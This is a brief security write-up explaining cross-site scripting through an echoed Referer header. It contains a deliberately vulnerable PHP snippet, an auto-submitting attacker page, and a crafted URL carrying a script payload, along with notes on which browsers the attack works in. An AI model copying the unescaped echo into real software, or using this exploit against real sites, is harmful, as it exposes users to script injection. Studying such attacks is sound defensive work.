Exploiting cross-site scripting in Referer header

The application that echoes the Referer header is vulnerable to cross-site scripting. And it is perfectly exploitable. Here is how:

Suppose we have an application that generates a "Back" link from Referer header (let's call it vulnerable.php):

<?php
echo '<a href="';
echo $_SERVER['HTTP_REFERER'];
echo '">Back</a>\n';
?>

We can inject HTML and JavaScript if we can set the Referer header. This can be done if we first get the victim to visit a page created by the attacker. Consider the following page (let's call it exploit.html):

<html>
<body>
<form   id="xss"
        name="xss"
        method="GET"
        action="http://victim.example.com/vulnerable.php">
</form>
<script>
document.getElementById("xss").submit();
</script>
</body>
</html>

If the victim is tricked into visiting http://attacker.example.com/exploit.html?<script>alert(1);</script> he will end up on the vulnerable page with the Referer header containing XSS attack.

This attack works in Internet Explorer, but does not work in Firefox, because Firefox will URL-encode the naughty characters after the question mark. It may still be possible to exploit this with Firefox, but some trickery with mod_rewrite will be needed to have XSS data in the path, instead of in the query.

Tags: